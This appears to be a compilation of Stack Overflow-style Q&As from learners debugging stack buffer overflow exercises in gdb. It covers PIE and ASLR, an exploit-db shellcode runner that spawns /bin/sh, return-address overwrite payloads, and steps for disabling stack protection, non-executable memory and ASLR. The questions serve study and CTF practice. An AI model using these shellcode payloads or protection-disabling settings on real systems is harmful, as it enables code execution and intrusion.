Inserting gdb breakpoints fail - c

I'm learning about buffer overflow in c.
For that purpose, I'm following this simple example.
I have the following gcc version:
$ gcc --version
gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
And this simple c file:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
char buf[256];
strcpy(buf, argv[1]);
printf("%s,", buf);
return 0;
}
I then compile this file with $ gcc buf.c -o buf.
I then open in gdb by $ gdb ./buf
I call disas and get the result assembly:
(gdb) disas main
Dump of assembler code for function main:
0x0000000000001189 <+0>: endbr64
0x000000000000118d <+4>: push %rbp
0x000000000000118e <+5>: mov %rsp,%rbp
0x0000000000001191 <+8>: sub $0x120,%rsp
0x0000000000001198 <+15>: mov %edi,-0x114(%rbp)
0x000000000000119e <+21>: mov %rsi,-0x120(%rbp)
0x00000000000011a5 <+28>: mov %fs:0x28,%rax
0x00000000000011ae <+37>: mov %rax,-0x8(%rbp)
0x00000000000011b2 <+41>: xor %eax,%eax
0x00000000000011b4 <+43>: mov -0x120(%rbp),%rax
0x00000000000011bb <+50>: add $0x8,%rax
0x00000000000011bf <+54>: mov (%rax),%rdx
0x00000000000011c2 <+57>: lea -0x110(%rbp),%rax
0x00000000000011c9 <+64>: mov %rdx,%rsi
0x00000000000011cc <+67>: mov %rax,%rdi
0x00000000000011cf <+70>: callq 0x1070 <strcpy#plt>
--Type <RET> for more, q to quit, c to continue without paging--
0x00000000000011d4 <+75>: lea -0x110(%rbp),%rax
0x00000000000011db <+82>: mov %rax,%rsi
0x00000000000011de <+85>: lea 0xe1f(%rip),%rdi # 0x2004
0x00000000000011e5 <+92>: mov $0x0,%eax
0x00000000000011ea <+97>: callq 0x1090 <printf#plt>
0x00000000000011ef <+102>: mov $0x0,%eax
0x00000000000011f4 <+107>: mov -0x8(%rbp),%rcx
0x00000000000011f8 <+111>: xor %fs:0x28,%rcx
0x0000000000001201 <+120>: je 0x1208 <main+127>
0x0000000000001203 <+122>: callq 0x1080 <__stack_chk_fail#plt>
0x0000000000001208 <+127>: leaveq
0x0000000000001209 <+128>: retq
End of assembler dump.
With some really low memory adresses.
I then want to see what happens if I input a big string of A's into the program, I therefore place a breakpoint at 0x00000000000011db
I then run it:
(gdb) run $(python3 -c "print('A'*256)"
Starting program: /home/ask/Notes/ctf/bufoverflow/code/buf $(python3 -c "print('A'*256)"
/bin/bash: -c: line 0: unexpected EOF while looking for matching `)'
/bin/bash: -c: line 1: syntax error: unexpected end of file
During startup program exited with code 1.
(gdb) run $(python3 -c "print('A'*256)")
Starting program: /home/ask/Notes/ctf/bufoverflow/code/buf $(python3 -c "print('A'*256)")
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x11db
Ok, so something with the memory adresses is a bit funky.
I google the issue and find this post where I find that this is because Position-Independent Executable (PIE) was probably enabled, and the memory adresses would be changed when the program is actually run.
I can confirm this by running disas after running the program, and seeing that the memory adresses are in a lot higher ranges.
This all makes sense, but it makes me wonder, iif the adresses change every time I run it, then how can I then place a breakpoint at a memory adress before the program runs?

iif the adresses change every time I run it, then how can I then place a breakpoint at a memory adress before the program runs?
This happens because GDB by default disables address randomization (to make debugging easier).
If you re-enable ASLR with (gdb) set disable-randomization off, then you wouldn't be able to set the breakpoint on an address.
You would still be able to set breakpoint on e.g. main -- in that case GDB will wait until the executable has been relocated, and will set the breakpoint on the actual runtime instruction (the address will change on every run).

Related

What controls whether code stored in the data section can run or not?

https://www.exploit-db.com/exploits/42179
#include <stdio.h>
unsigned char shellcode[] = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}
According to the comment in the code, gcc -fno-stack-protector -z execstack shell.c -o shell is supposed to compiled the code on #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux.
I get the following error when I try the above code. How to make it work? What has been changed in the OS so that it does not work any more?
$ uname -a
Linux kali 5.10.0-kali4-amd64 #1 SMP Debian 5.10.19-1kali1 (2021-03-03) x86_64 GNU/Linux
$ gcc -fno-stack-protector -z execstack shell.c -o shell
$ ./shell
Segmentation fault
EDIT: It seems the problem is related with kali linux. The same binary runs on Ubuntu 64bit. I tried to step through the binary with gdb on kali.
The segmentation fault on kali is generated when the shellcode is run.
$ gdb -q shell
Reading symbols from shell...
(No debugging symbols found in shell)
(gdb) b main
Breakpoint 1 at 0x1129
(gdb) start
Temporary breakpoint 2 at 0x1129
Starting program: /tmp/shell
Breakpoint 1, 0x0000555555555129 in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555125 <+0>: push %rbp
0x0000555555555126 <+1>: mov %rsp,%rbp
=> 0x0000555555555129 <+4>: sub $0x10,%rsp
0x000055555555512d <+8>: lea 0x2efc(%rip),%rax # 0x555555558030 <shellcode>
0x0000555555555134 <+15>: mov %rax,-0x8(%rbp)
0x0000555555555138 <+19>: mov -0x8(%rbp),%rdx
0x000055555555513c <+23>: mov $0x0,%eax
0x0000555555555141 <+28>: call *%rdx
0x0000555555555143 <+30>: mov $0x0,%eax
0x0000555555555148 <+35>: leave
0x0000555555555149 <+36>: ret
End of assembler dump.
(gdb) si 5
0x0000555555555141 in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555125 <+0>: push %rbp
0x0000555555555126 <+1>: mov %rsp,%rbp
0x0000555555555129 <+4>: sub $0x10,%rsp
0x000055555555512d <+8>: lea 0x2efc(%rip),%rax # 0x555555558030 <shellcode>
0x0000555555555134 <+15>: mov %rax,-0x8(%rbp)
0x0000555555555138 <+19>: mov -0x8(%rbp),%rdx
0x000055555555513c <+23>: mov $0x0,%eax
=> 0x0000555555555141 <+28>: call *%rdx
0x0000555555555143 <+30>: mov $0x0,%eax
0x0000555555555148 <+35>: leave
0x0000555555555149 <+36>: ret
End of assembler dump.
(gdb) si
0x0000555555558030 in shellcode ()
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0x0000555555558030 in shellcode ()
(gdb) x/16bx 0x0000555555558030
0x555555558030 <shellcode>: 0x50 0x48 0x31 0xd2 0x48 0x31 0xf6 0x48
0x555555558038 <shellcode+8>: 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x2f 0x73
Using the same binary on Ubuntu, the shellcode runs correctly.
When I modify the code by putting the shellcode in the stack, then it can run on kali. So the problem is related with whether code in data can be run or not. What controls this behavior?
$ cat shell.c
#include <stdio.h>
int main() {
unsigned char shellcode[] = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int (*ret)() = (int(*)())shellcode;
ret();
}
What has been changed in the OS so that it does not work any more?
It used to be that readonly-data (.rodata) was put into the read-execute segment, together with .text.
To put shellcode into .rodata, you would need to make it const:
unsigned const char shellcode[] = ...
I don't think the example without const ever worked.
Once you put it into .rodata, it will work when linking with -Wl,-z,noseparate-code on newer systems (if your linker doesn't support noseparate-code, then it is probably old enough that the example will work without any special flags).

gdb addresses: 0x565561f5 instead of 0x41414141

I want to try a buffer overflow on a c program. I compiled it like this gcc -fno-stack-protector -m32 buggy_program.c with gcc. If i run this program in gdb and i overflow the buffer, it should said 0x41414141, because i sent A's. But its saying 0x565561f5. Sorry for my bad english. Can somebody help me?
This is the source code:
#include <stdio.h>
int main(int argc, char **argv)
{
char buffer[64];
printf("Type in something: ");
gets(buffer);
}
Starting program: /root/Downloads/a.out
Type in something: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x565561f5 in main ()
I want to see this:
Starting program: /root/Downloads/a.out
Type in something: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in main ()
Looking at the address at which the process segfaulted shows the relevant line in the disassembled code:
gdb a.out <<EOF
set logging on
r < inp
disassemble main
x/i $eip
p/x $esp
Produces the following output:
(gdb) Starting program: .../a.out < in
Program received signal SIGSEGV, Segmentation fault.
0x08048482 in main (argc=, argv=) at tmp.c:10 10 }
(gdb) Dump of assembler code for function main:
0x08048436 <+0>: lea 0x4(%esp),%ecx
0x0804843a <+4>: and $0xfffffff0,%esp
0x0804843d <+7>: pushl -0x4(%ecx)
0x08048440 <+10>: push %ebp
0x08048441 <+11>: mov %esp,%ebp
0x08048443 <+13>: push %ebx
0x08048444 <+14>: push %ecx
0x08048445 <+15>: sub $0x40,%esp
0x08048448 <+18>: call
0x8048370 <__x86.get_pc_thunk.bx>
0x0804844d <+23>: add $0x1bb3,%ebx
0x08048453 <+29>: sub $0xc,%esp
0x08048456 <+32>: lea -0x1af0(%ebx),%eax
0x0804845c <+38>: push %eax
0x0804845d <+39>: call 0x8048300
0x08048462 <+44>: add $0x10,%esp
0x08048465 <+47>: sub $0xc,%esp
0x08048468 <+50>: lea -0x48(%ebp),%eax
0x0804846b <+53>: push %eax
0x0804846c <+54>: call 0x8048310
0x08048471 <+59>: add $0x10,%esp
0x08048474 <+62>: mov $0x0,%eax
0x08048479 <+67>: lea -0x8(%ebp),%esp
0x0804847c <+70>: pop %ecx
0x0804847d <+71>: pop %ebx
0x0804847e <+72>: pop %ebp
0x0804847f <+73>: lea -0x4(%ecx),%esp
=> 0x08048482 <+76>: ret
End of assembler dump.
(gdb) => 0x8048482 : ret
(gdb) $1 = 0x4141413d
(gdb) quit
The failing statement is the ret at the end of main. The program fails, when ret attempts to load the return-address from the top of the stack. The produced executable stores the old value of esp on the stack, before aligning to word-boundaries. When main is completed, the program attempts to restore the esp from the stack and afterwards read the return-address. However the whole top of the stack is compromised, thus rendering the new value of the stack-pointer garbage ($1 = 0x4141413d). When ret is executed, it attempts to read a word from address 0x4141413d, which isn't allocated and produces as segfault.
Notes
The above disassembly was produced from the code in the question using the following compiler-options:
-m32 -fno-stack-protector -g -O0
So guys, i found a solution:
Just compile it with gcc 3.3.4
gcc -m32 buggy_program.c
Modern operating systems use address-space-layout-randomization ASLR to make this stuff not work quite so easily.
I remember the controversy when it was first started. ASLR was kind of a bad idea for 32 bit processes due to the number of other constraints it imposed on the system and dubious security benefit. On the other hand, it works great on 64 bit processes and almost everybody uses it now.
You don't know where the code is. You don't know where the heap is. You don't know where the stack is. Writing exploits is hard now.
Also, you tried to use 32 bit shellcode and documentation on a 64 bit process.
On reading the updated question: Your code is compiled with frame pointers (which is the default). This is causing the ret instruction itself to fault because esp is trashed. ASLR appears to still be in play most likely it doesn't really matter.

How do i bypass a return adress overwrite not redirecting control flow?

Let me illustrate the problem here
This is main
(gdb) disass main
Dump of assembler code for function main:
0x000000000040057c <+0>: push rbp
0x000000000040057d <+1>: mov rbp,rsp
0x0000000000400580 <+4>: sub rsp,0x40
0x0000000000400584 <+8>: mov DWORD PTR [rbp-0x34],edi
0x0000000000400587 <+11>: mov QWORD PTR [rbp-0x40],rsi
0x000000000040058b <+15>: mov rax,QWORD PTR [rbp-0x40]
0x000000000040058f <+19>: add rax,0x8
0x0000000000400593 <+23>: mov rdx,QWORD PTR [rax]
0x0000000000400596 <+26>: lea rax,[rbp-0x30]
0x000000000040059a <+30>: mov rsi,rdx
0x000000000040059d <+33>: mov rdi,rax
0x00000000004005a0 <+36>: call 0x400430 <strcpy#plt>
0x00000000004005a5 <+41>: mov eax,0x0
0x00000000004005aa <+46>: call 0x400566 <function>
0x00000000004005af <+51>: mov eax,0x0
0x00000000004005b4 <+56>: leave
0x00000000004005b5 <+57>: ret
End of assembler dump.
(gdb) list
#include <stdio.h>
#include <string.h>
void function(){
printf("test");
}
int main(int argc, char* argv[]) {
char a[34];
strcpy(a , argv[1]);
function();
return 0;
}
It was compiled using the following:
gcc -g -o exploitable0 vulnerable_program0.c -fno-stack-protector -z execstack
The attacker is obviously tempted to overrun the buffer specified by the array 'a'.
Let's examine more in depth what the stack looks like when i run the exploit
(gdb) run $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Starting program: /home/twister17/Documents/hacking/exploitable0 $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Breakpoint 1, main (argc=2, argv=0x7fffffffdcf8) at vulnerable_program0.c:9
9 function();
(gdb) i r rbp
rbp 0x7fffffffdc10 0x7fffffffdc10
(gdb) i r rsp
rsp 0x7fffffffdbd0 0x7fffffffdbd0
(gdb) x/18xw $rsp
0x7fffffffdbd0: 0xffffdcf8 0x00007fff 0x0040060d 0x00000002
0x7fffffffdbe0: 0x315915eb 0x3104b0c0 0x31c3ffdb 0xcd0fb2d2
0x7fffffffdbf0: 0xff01b080 0xe880cdcb 0xffffffe6 0x6c6c6548
0x7fffffffdc00: 0x771f2c6f 0x646c726f 0x21212121 0x21212121
0x7fffffffdc10: 0x00400566 0x00000000
(gdb)
the affected buffer starts at 0x7fffffffdbe0 and ends at 0x7fffffffdc10.
The shellcode injects smoothtly , to make things simpler i overwrite the return address with that of the function.
That is, I actually used 0x400566 as the return address, so if everything runs smoothly it would just call the function and print "test". You can clearly see from the assembly dump that is the address of the function "function"
expected output: "testtest".
actual output: test ( the program calls the function already).
I think you're having troubles with the StackGuard protection from GCC that prevents buffer overflows.
Try compiling your code with the
-fno-stack-protector
flag in order to disable the protection for your program.
Assuming you're running it on Linux, if you want to disable kernel based protection, which is called Address Space Randomization, you can run :
sysctl -w kernel.randomize_va_space=0

Overflow buffer in C on x86_64 to call function

Hello i have such code
#include <stdio.h>
#define SECRET "1234567890AZXCVBNFRT"
int checksecret(){
char buf[32];
gets(buf);
if(strcmp(SECRET,buf)==0) return 1;
else return 0;
}
void outsecret(){
printf("%s\n",SECRET);
}
int main(int argc, char** argv){
if (checksecret()){
outsecret();
};
}
disass of outsecret
(gdb) disassemble outsecret
Dump of assembler code for function outsecret:
0x00000000004005f4 <+0>: push %rbp
0x00000000004005f5 <+1>: mov %rsp,%rbp
0x00000000004005f8 <+4>: mov $0x4006b4,%edi
0x00000000004005fd <+9>: callq 0x400480 <puts#plt>
0x0000000000400602 <+14>: pop %rbp
0x0000000000400603 <+15>: retq
I have an assumption that i don't know SECRET, so i try to run my program with such string python -c 'print "A" * 32 + "\x40\x05\xf4"[::-1]'. But it fails with segmentation fault. What i am doing wrong? Thank you for any help.
PS
I want to call function outsecret by overwriting return code in checksecret
You have to remember that all strings have an extra character that terminates the string, so if you input 32 characters then gets will write 33 characters to the buffer. Writing beyond the limits of an array leads to undefined behavior which often leads to crashes.
The gets function have no bounds-checking, and is very dangerous to use. It has been deprecated since long, and in the latest C11 standard it has even been removed.
$ python -c 'print "A" * 32 + "\x40\x05\xf4"[::1]'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#
$ perl -le 'print length("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#")'
33
Your input string is too long for buffer size of 32 characters (extra one is needed for '\0' terminating null character). You are victim to buffer or array overflow (sometimes also called as array overrun).
Note that gets() is deprecated in C99 and eventually it has been dropped in C11 Standard for security reasons.
I want to call function outsecret by overwriting return code in
checksecret
Beware, you are about to leave relatively safe regions of C Standard. This means that behaviour is relative to compiler, compiler's versions, optimization settings, ABI and so on (maybe inclucing current phase of moon).
As of x86 calling conventions integer return value is stored directly in %eax register (that's assuming that you have x86 or x86-64 CPU). Stack-likely-located array buf is handled by %rbp offsets within current stack frame. Let's consult with gdb disassemble command:
$ gcc -O0 test.c
$ gdb -q a.out
(gdb) b checksecret
(gdb) r
Breakpoint 1, 0x0000000000400631 in checksecret ()
(gdb) disas
Dump of assembler code for function checksecret:
0x000000000040062d <+0>: push %rbp
0x000000000040062e <+1>: mov %rsp,%rbp
=> 0x0000000000400631 <+4>: sub $0x30,%rsp
0x0000000000400635 <+8>: mov %fs:0x28,%rax
0x000000000040063e <+17>: mov %rax,-0x8(%rbp)
0x0000000000400642 <+21>: xor %eax,%eax
0x0000000000400644 <+23>: lea -0x30(%rbp),%rax
0x0000000000400648 <+27>: mov %rax,%rdi
0x000000000040064b <+30>: callq 0x400530 <gets#plt>
0x0000000000400650 <+35>: lea -0x30(%rbp),%rax
0x0000000000400654 <+39>: mov %rax,%rsi
0x0000000000400657 <+42>: mov $0x400744,%edi
0x000000000040065c <+47>: callq 0x400510 <strcmp#plt>
0x0000000000400661 <+52>: test %eax,%eax
0x0000000000400663 <+54>: jne 0x40066c <checksecret+63>
0x0000000000400665 <+56>: mov $0x1,%eax
0x000000000040066a <+61>: jmp 0x400671 <checksecret+68>
0x000000000040066c <+63>: mov $0x0,%eax
0x0000000000400671 <+68>: mov -0x8(%rbp),%rdx
0x0000000000400675 <+72>: xor %fs:0x28,%rdx
0x000000000040067e <+81>: je 0x400685 <checksecret+88>
0x0000000000400680 <+83>: callq 0x4004f0 <__stack_chk_fail#plt>
0x0000000000400685 <+88>: leaveq
0x0000000000400686 <+89>: retq
There is no way overwrite %eax directly from C code, but what you could do is to overwrite selective fragment of code section. In your case what you want is to replace:
0x000000000040066c <+63>: mov $0x0,%eax
with
0x000000000040066c <+63>: mov $0x1,%eax
It's easy to accomplish by gdb itself:
(gdb) x/2bx 0x40066c
0x40066c <checksecret+63>: 0xb8 0x00
set {unsigned char}0x40066d = 1
Now let's confirm it:
(gdb) x/i 0x40066c
0x40066c <checksecret+63>: mov $0x1,%eax
From that point checksecret() is returning 1 even if SECRET does not match. However It wouldn't be so easy to do it by buf itself, as you need to know (guess somehow?) correct offset of particular code section instruction.
Above answers are pretty clear and corret way to exploit buffer overflow vulnerability. But there is a different way to do same thing without exploit vulnerability.
mince#rootlab tmp $ gcc test.c -o test
mince#rootlab tmp $ strings test
/lib64/ld-linux-x86-64.so.2
libc.so.6
gets
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-X
UH-X
[]A\A]A^A_
1234567890AZXCVBNFRT
;*3$
Please look at last 2 row. You will see your secret key in there.

How does GDB determine the address to break at when you do "break function-name"?

A simple example that demonstrates my issue:
// test.c
#include <stdio.h>
int foo1(int i) {
i = i * 2;
return i;
}
void foo2(int i) {
printf("greetings from foo! i = %i", i);
}
int main() {
int i = 7;
foo1(i);
foo2(i);
return 0;
}
$ clang -o test -O0 -Wall -g test.c
Inside GDB I do the following and start the execution:
(gdb) b foo1
(gdb) b foo2
After reaching the first breakpoint, I disassemble:
(gdb) disassemble
Dump of assembler code for function foo1:
0x0000000000400530 <+0>: push %rbp
0x0000000000400531 <+1>: mov %rsp,%rbp
0x0000000000400534 <+4>: mov %edi,-0x4(%rbp)
=> 0x0000000000400537 <+7>: mov -0x4(%rbp),%edi
0x000000000040053a <+10>: shl $0x1,%edi
0x000000000040053d <+13>: mov %edi,-0x4(%rbp)
0x0000000000400540 <+16>: mov -0x4(%rbp),%eax
0x0000000000400543 <+19>: pop %rbp
0x0000000000400544 <+20>: retq
End of assembler dump.
I do the same after reaching the second breakpoint:
(gdb) disassemble
Dump of assembler code for function foo2:
0x0000000000400550 <+0>: push %rbp
0x0000000000400551 <+1>: mov %rsp,%rbp
0x0000000000400554 <+4>: sub $0x10,%rsp
0x0000000000400558 <+8>: lea 0x400644,%rax
0x0000000000400560 <+16>: mov %edi,-0x4(%rbp)
=> 0x0000000000400563 <+19>: mov -0x4(%rbp),%esi
0x0000000000400566 <+22>: mov %rax,%rdi
0x0000000000400569 <+25>: mov $0x0,%al
0x000000000040056b <+27>: callq 0x400410 <printf#plt>
0x0000000000400570 <+32>: mov %eax,-0x8(%rbp)
0x0000000000400573 <+35>: add $0x10,%rsp
0x0000000000400577 <+39>: pop %rbp
0x0000000000400578 <+40>: retq
End of assembler dump.
GDB obviously uses different offsets (+7 in foo1 and +19 in foo2), with respect to the beginning of the function, when setting the breakpoint. How can I determine this offset by myself without using GDB?
gdb uses a few methods to decide this information.
First, the very best way is if your compiler emits DWARF describing the function. Then gdb can decode the DWARF to find the end of the prologue.
However, this isn't always available. GCC emits it, but IIRC only when optimization is used.
I believe there's also a convention that if the first line number of a function is repeated in the line table, then the address of the second instance is used as the end of the prologue. That is if the lines look like:
< function f >
line 23 0xffff0000
line 23 0xffff0010
Then gdb will assume that the function f's prologue is complete at 0xfff0010.
I think this is the mode used by gcc when not optimizing.
Finally gdb has some prologue decoders that know how common prologues are written on many platforms. These are used when debuginfo isn't available, though offhand I don't recall what the purpose of that is.
As others mentioned, even without debugging symbols GDB has a function prologue decoder, i.e. heuristic magic.
To disable that, you can add an asterisk before the function name:
break *func
On Binutils 2.25 the skip algorithm on seems to be at: symtab.c:skip_prologue_sal, which breakpoints.c:break_command, the command definition, calls indirectly.
The prologue is a common "boilerplate" used at the start of function calls.
The prologues of foo2 is longer than that of foo1 by two instructions because:
sub $0x10,%rsp
foo2 calls another function, so it is not a leaf function. This prevents some optimizations, in particular it must reduce the rsp before another call to save room for the local state.
Leaf functions don't need that because of the 128 byte ABI red zone, see also: Why does the x86-64 GCC function prologue allocate less stack than the local variables?
foo1 however is a leaf function.
lea 0x400644,%rax
For some reason, clang stores the address of local string constants (stored in .rodata) in registers as part of the function prologue.
We know that rax contains "greetings from foo! i = %i" because it is then passed to %rdi, the first argument of printf.
foo1 does not have local strings constants however.
The other instructions of the prologue are common to both functions:
rbp manipulation is discussed at: What is the purpose of the EBP frame pointer register?
mov %edi,-0x4(%rbp) stores the first argument on the stack. This is not required on leaf functions, but clang does it anyways. It makes register allocation easier.
On ELF platforms like linux, debug information is stored in a separate (non-executable) section in the executable. In this separate section there is all the information that is needed by the debugger. Check the DWARF2 specification for the specifics.

Resources